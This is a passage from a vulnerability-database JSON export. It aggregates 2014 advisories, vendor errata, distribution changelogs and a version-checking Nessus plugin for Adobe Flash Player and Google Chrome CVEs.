(CVE-2014-1736)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2014-04-25T00:00:00", "type": "nessus", "title": "Google Chrome < 34.0.1847.131 Multiple Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515", "CVE-2014-1730", "CVE-2014-1731", "CVE-2014-1732", "CVE-2014-1733", "CVE-2014-1734", "CVE-2014-1735", "CVE-2014-1736"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_34_0_1847_131.NASL", "href": "https://www.tenable.com/plugins/nessus/73711", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73711);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\n \"CVE-2014-0515\",\n \"CVE-2014-1730\",\n \"CVE-2014-1731\",\n \"CVE-2014-1732\",\n \"CVE-2014-1733\",\n \"CVE-2014-1734\",\n \"CVE-2014-1735\",\n \"CVE-2014-1736\"\n );\n script_bugtraq_id(67082, 67092);\n\n script_name(english:\"Google Chrome < 34.0.1847.131 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks version number of Google Chrome\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\na version prior to 34.0.1847.131. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A buffer overflow error exists related to the included\n version of Flash Player. (CVE-2014-0515)\n\n - Type confusion errors exist related to the V8\n JavaScript engine and DOM handling. (CVE-2014-1730,\n CVE-2014-1731)\n\n - A use-after-free error exists related to speech\n recognition processing. 
(CVE-2014-1732)\n\n - An error exists related to compiling in 'Seccomp-BPF'.\n (CVE-2014-1733)\n\n - Various, unspecified errors exist. (CVE-2014-1734)\n\n - Various, unspecified errors exist related to the V8\n JavaScript engine. (CVE-2014-1735)\n\n - An integer overflow error exists related to the V8\n JavaScript engine. (CVE-2014-1736)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2014/04/stable-channel-update_24.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b5291952\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-13.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 34.0.1847.131 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Shader Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'34.0.1847.131', severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2021-06-08T18:46:17", "description": "Use-after-free, buffer overflow, restrictions bypass, cross-site scripting.", "cvss3": {}, "published": "2014-05-04T00:00:00", "type": "securityvulns", "title": "Adobe Flash Player multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-0509", "CVE-2014-0492", "CVE-2014-0508", "CVE-2014-0503", "CVE-2014-0515", "CVE-2014-0498", "CVE-2014-0504", "CVE-2014-0507", "CVE-2014-0491", "CVE-2014-0497", "CVE-2014-0506", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:VULN:13726", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13726", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:52", "description": "\r\n\r\nVUPEN Security Research - Adobe Flash ExternalInterface Use-After-Free\r\nCode Execution (Pwn2Own)\r\n\r\nWebsite : http://www.vupen.com\r\n\r\nTwitter : http://twitter.com/vupen\r\n\r\n\r\nI. BACKGROUND\r\n---------------------\r\n\r\nAdobe Flash Player is a cross-platform browser-based application runtime\r\nthat delivers viewing of expressive applications, content, and videos\r\nacross screens and browsers. 
It is installed on 98% of computers.\r\n\r\n\r\nII. DESCRIPTION\r\n---------------------\r\n\r\nVUPEN Vulnerability Research Team discovered a critical vulnerability\r\nin Adobe Flash.\r\n\r\nThe vulnerability is caused by a use-after-free error when interacting\r\nwith the \"ExternalInterface\" class from the browser, which could be\r\nexploited to achieve code execution via a malicious web page.\r\n\r\n\r\nIII. AFFECTED PRODUCTS\r\n---------------------------\r\n\r\nAdobe Flash versions prior to 13.0.0.182\r\n\r\n\r\nIV. SOLUTION\r\n----------------\r\n\r\nUpgrade to Adobe Flash v13.0.0.182.\r\n\r\n\r\nV. CREDIT\r\n--------------\r\n\r\nThis vulnerability was discovered by VUPEN Security.\r\n\r\n\r\nVI. ABOUT VUPEN Security\r\n---------------------------\r\n\r\nVUPEN is the leading provider of defensive and offensive cyber security\r\nintelligence and advanced zero-day research. All VUPEN's vulnerability\r\nintelligence results exclusively from its internal and in-house R&D\r\nefforts conducted by its team of world-class researchers.\r\n\r\nVUPEN Solutions: http://www.vupen.com/english/services/\r\n\r\n\r\nVII. REFERENCES\r\n----------------------\r\n\r\nhttp://helpx.adobe.com/security/products/flash-player/apsb14-09.html\r\nhttp://zerodayinitiative.com/advisories/ZDI-14-092/\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0506\r\n\r\n\r\nVIII. 
DISCLOSURE TIMELINE\r\n-----------------------------\r\n\r\n2014-01-28 - Vulnerability Discovered by VUPEN Security\r\n2014-03-13 - Vulnerability Reported to Adobe During Pwn2Own 2014\r\n2014-04-08 - Vulnerability Fixed by Adobe\r\n2014-04-14 - Public disclosure\r\n\r\n", "cvss3": {}, "published": "2014-05-04T00:00:00", "type": "securityvulns", "title": "VUPEN Security Research - Adobe Flash ExternalInterface Use-After-Free Code Execution (Pwn2Own)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-0506"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30594", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30594", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "altlinux": [{"lastseen": "2022-06-10T03:07:05", "description": "3:11-alt28 built April 15, 2014 Sergey V Turchin in task [#118324](<https://git.altlinux.org/tasks/118324/>) \n--- \nApril 15, 2014 Sergey V Turchin \n \n \n - new version\n - security fixes:\n CVE-2014-0506, CVE-2014-0507, CVE-2014-0508, CVE-2014-0509\n", "cvss3": {}, "published": "2014-04-15T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 7 package adobe-flash-player version 3:11-alt28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2014-04-15T00:00:00", "id": "C1698F34A394319E0076F3F1117FE11F", "href": 
"https://packages.altlinux.org/en/p7/srpms/adobe-flash-player/1707551309196135328", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-10T03:07:30", "description": "3:11-alt28 built April 15, 2014 Sergey V Turchin in task [#118325](<https://git.altlinux.org/tasks/118325/>) \n--- \nApril 15, 2014 Sergey V Turchin \n \n \n - new version\n - security fixes:\n CVE-2014-0506, CVE-2014-0507, CVE-2014-0508, CVE-2014-0509\n", "cvss3": {}, "published": "2014-04-15T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 6 package adobe-flash-player version 3:11-alt28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2014-04-15T00:00:00", "id": "698F04960C6FDCECD3FAF3107FEF2E6C", "href": "https://packages.altlinux.org/en/p6/srpms/adobe-flash-player/1707551309196135328", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-10T03:07:06", "description": "3:11-alt27 built March 13, 2014 Sergey V Turchin in task [#116325](<https://git.altlinux.org/tasks/116325/>) \n--- \nMarch 13, 2014 Sergey V Turchin \n \n \n - new version\n - security fixes: CVE-2014-0503, CVE-2014-0504\n", "cvss3": {}, "published": "2014-03-13T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 7 package adobe-flash-player version 3:11-alt27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2014-03-13T00:00:00", "id": "985F12E046E3CBC5A14C9DCABE931222", "href": "https://packages.altlinux.org/en/p7/srpms/adobe-flash-player/1695284624141279036", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-06-10T03:07:31", "description": "3:11-alt27 built March 13, 2014 Sergey V Turchin in task [#116326](<https://git.altlinux.org/tasks/116326/>) \n--- \nMarch 13, 2014 Sergey V Turchin \n \n \n - new version\n - security fixes: CVE-2014-0503, CVE-2014-0504\n", "cvss3": {}, "published": "2014-03-13T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 6 package adobe-flash-player version 3:11-alt27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2014-03-13T00:00:00", "id": "BAED9BAFC78A2114C200DC6B81159C80", "href": "https://packages.altlinux.org/en/p6/srpms/adobe-flash-player/1695284624141279036", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-06-10T03:07:29", "description": "3:11-alt29 built 
April 29, 2014 Sergey V Turchin in task [#118985](<https://git.altlinux.org/tasks/118985/>) \n--- \nApril 29, 2014 Sergey V Turchin \n \n \n - new version\n - security fixes: CVE-2014-0515\n", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 6 package adobe-flash-player version 3:11-alt29", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0515"], "modified": "2014-04-29T00:00:00", "id": "55FA88D25AACA760803996FE8A2C7905", "href": "https://packages.altlinux.org/en/p6/srpms/adobe-flash-player/1712802361818962663", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-10T03:07:05", "description": "3:11-alt29 built April 29, 2014 Sergey V Turchin in task [#118984](<https://git.altlinux.org/tasks/118984/>) \n--- \nApril 29, 2014 Sergey V Turchin \n \n \n - new version\n - security fixes: CVE-2014-0515\n", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 7 package adobe-flash-player version 3:11-alt29", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0515"], "modified": "2014-04-29T00:00:00", "id": "AE49719E4DEE478C3CB94C7C7539230B", "href": "https://packages.altlinux.org/en/p7/srpms/adobe-flash-player/1712802361818962663", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:40:21", "description": "Adobe flash-player has been updated to version 11.2.202.350\n to resolve security issues and bugs. More information can\n be found at\n\n <a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb14\">http://helpx.adobe.com/security/products/flash-player/apsb14</a>\n -09.html\n <<a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb1\">http://helpx.adobe.com/security/products/flash-player/apsb1</a>\n 4-09.html>\n\n The following security issues have been fixed:\n\n * a use-after-free vulnerability that could have\n resulted in arbitrary code execution (CVE-2014-0506).\n * a buffer overflow vulnerability that could have\n resulted in arbitrary code execution (CVE-2014-0507).\n * a security bypass vulnerability that could have lead\n to information disclosure (CVE-2014-0508).\n * a cross-site-scripting vulnerability (CVE-2014-0509).\n", "cvss3": {}, "published": "2014-04-16T19:04:49", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0509", "CVE-2014-0508", "CVE-2014-0507", "CVE-2014-0506"], "modified": "2014-04-16T19:04:49", "id": "SUSE-SU-2014:0535-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00012.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:22:34", "description": "This update of Adobe Flash Player fixes the following\n issues:\n\n * A stack overflow vulnerability that could have\n 
resulted in arbitrary code execution. (CVE-2014-0498)\n * A memory leak vulnerability that could have been used\n to defeat memory address layout randomization.\n (CVE-2014-0499)\n * A double free vulnerability that could have resulted\n in arbitrary code execution. (CVE-2014-0502)\n", "cvss3": {}, "published": "2014-02-25T20:04:15", "type": "suse", "title": "Security update for flash-player (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2014-02-25T20:04:15", "id": "SUSE-SU-2014:0290-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-02/msg00017.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:22:34", "description": "Adobe Flash Player was updated to 11.2.202.341: (bnc#865021)\n * APSB14-07, CVE-2014-0498 CVE-2014-0499 CVE-2014-0502\n - Contents of flashplayer_11_sa.i386.tar.gz changed back:\n spec file updated, supplementary script (update.sh)\n updated.\n\n", "cvss3": {}, "published": "2014-02-24T08:04:11", "type": "suse", "title": "flash-player: update to 11.2.202.341 security release (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2014-02-24T08:04:11", "id": "OPENSUSE-SU-2014:0277-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-02/msg00014.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:40:17", "description": "Adobe Flash Player was updated to 11.2.202.341: (bnc#865021)\n * APSB14-07, CVE-2014-0498 CVE-2014-0499 CVE-2014-0502\n - Contents of flashplayer_11_sa.i386.tar.gz changed back:\n spec file updated, supplementary script (update.sh)\n updated.\n\n", "cvss3": {}, "published": "2014-02-24T11:04:11", "type": "suse", "title": "flash-player: update to 11.2.202.341 security release 
(critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2014-02-24T11:04:11", "id": "OPENSUSE-SU-2014:0278-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-02/msg00015.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:45:49", "description": "Adobe Flash Player was updated to version 11.2.202.346 to\n fix security issues:\n\n * CVE-2014-0503: A vulnerability that could be used to\n bypass the same origin policy was fixed.\n * CVE-2014-0504: A vulnerability that could be used to\n read the contents of the clipboard was fixed.\n\n More information can be found on:\n <a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb14\">http://helpx.adobe.com/security/products/flash-player/apsb14</a>\n -08.html\n <<a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb1\">http://helpx.adobe.com/security/products/flash-player/apsb1</a>\n 4-08.html>\n\n Security Issues references:\n\n * CVE-2014-0503\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0503\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0503</a>\n >\n * CVE-2014-0504\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0504\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0504</a>\n >\n\n", "cvss3": {}, "published": "2014-03-18T00:04:14", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2014-03-18T00:04:14", "id": "SUSE-SU-2014:0387-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-03/msg00014.html", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-04T12:35:28", "description": "Adobe Flash 
Player was updated to version 11.2.202.346 to\n fix security issues:\n\n CVE-2014-0503: A vulnerability that could be used to bypass\n the same origin policy was fixed.\n\n CVE-2014-0504: A vulnerability that could be used to read\n the contents of the clipboard was fixed.\n\n More information can be found on:\n <a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb14\">http://helpx.adobe.com/security/products/flash-player/apsb14</a>\n -08.html\n\n", "cvss3": {}, "published": "2014-03-15T10:04:12", "type": "suse", "title": "flash-player to 11.2.202.346 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2014-03-15T10:04:12", "id": "OPENSUSE-SU-2014:0379-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-03/msg00013.html", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-04T12:36:41", "description": "Adobe Flash Player was updated to version 11.2.202.346 to\n fix security issues:\n\n CVE-2014-0503: A vulnerability that could be used to bypass\n the same origin policy was fixed.\n\n CVE-2014-0504: A vulnerability that could be used to read\n the contents of the clipboard was fixed.\n\n More information can be found on:\n <a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb14\">http://helpx.adobe.com/security/products/flash-player/apsb14</a>\n -08.html\n\n", "cvss3": {}, "published": "2014-03-14T21:04:13", "type": "suse", "title": "flash-player to 11.2.202.346 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504", "CVE-2013-0504"], "modified": "2014-03-14T21:04:13", "id": "OPENSUSE-SU-2014:0377-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-03/msg00012.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:31:33", 
"description": "This flash-player update to version 11.2.202.356 fixes the\n following critical security issue:\n\n * bnc#875577: buffer overflow vulnerability that leads\n to arbitrary code execution (CVE-2014-0515)\n\n Adobe Security Bulletin (APSB14-13)\n <a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb14\">http://helpx.adobe.com/security/products/flash-player/apsb14</a>\n -13.html\n <<a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb1\">http://helpx.adobe.com/security/products/flash-player/apsb1</a>\n 4-13.html>\n", "cvss3": {}, "published": "2014-05-03T01:04:15", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2014-05-03T01:04:15", "id": "SUSE-SU-2014:0605-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-05/msg00001.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:22:47", "description": "This flash-player update fixes a critical buffer overflow\n vulnerability that leads to arbitrary code execution.\n\n The flash-player package was updated to version\n 11.2.202.356.\n * bnc#875577, APSB14-13, CVE-2014-0515\n\n", "cvss3": {}, "published": "2014-04-30T10:05:37", "type": "suse", "title": "update for flash-player (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2014-04-30T10:05:37", "id": "OPENSUSE-SU-2014:0585-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00017.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:22:35", "description": "This flash-player update fixes a critical buffer overflow\n vulnerability that leads to arbitrary code execution.\n\n The flash-player package was updated to version\n 11.2.202.356.\n * 
bnc#875577, APSB14-13, CVE-2014-0515\n\n", "cvss3": {}, "published": "2014-05-01T21:04:13", "type": "suse", "title": "update for flash-player (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2014-05-01T21:04:13", "id": "OPENSUSE-SU-2014:0589-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-05/msg00000.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2023-05-26T10:21:36", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security Bulletin APSB14-09,\nlisted in the References section.\n\nTwo flaws were found in the way flash-plugin displayed certain SWF content.\nAn attacker could use these flaws to create a specially crafted SWF file\nthat would cause flash-plugin to crash or, potentially, execute arbitrary\ncode when the victim loaded a page containing the malicious SWF content.\n(CVE-2014-0506, CVE-2014-0507)\n\nA flaw in flash-plugin could allow an attacker to obtain sensitive\ninformation if a victim were tricked into visiting a specially crafted web\npage. (CVE-2014-0508)\n\nA flaw in flash-plugin could allow an attacker to conduct cross-site\nscripting (XSS) attacks if a victim were tricked into visiting a specially\ncrafted web page. 
(CVE-2014-0509)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.350.\n", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "redhat", "title": "(RHSA-2014:0380) Critical: flash-plugin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2018-06-07T05:04:28", "id": "RHSA-2014:0380", "href": "https://access.redhat.com/errata/RHSA-2014:0380", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-26T10:21:36", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security bulletin APSB14-07,\nlisted in the References section. Specially-crafted SWF content could\ncause flash-plugin to crash or, potentially, execute arbitrary code when a\nvictim loads a page containing the malicious SWF content. 
(CVE-2014-0498,\nCVE-2014-0499, CVE-2014-0502)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.341.\n", "cvss3": {}, "published": "2014-02-21T00:00:00", "type": "redhat", "title": "(RHSA-2014:0196) Critical: flash-plugin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502"], "modified": "2018-06-07T05:04:37", "id": "RHSA-2014:0196", "href": "https://access.redhat.com/errata/RHSA-2014:0196", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-26T10:21:36", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes two vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security bulletin APSB14-08,\nlisted in the References section.\n\nA vulnerability was reported that could be used to bypass the same origin\npolicy. (CVE-2014-0503)\n\nA vulnerability was reported that could be used to read the contents of the\nclipboard. 
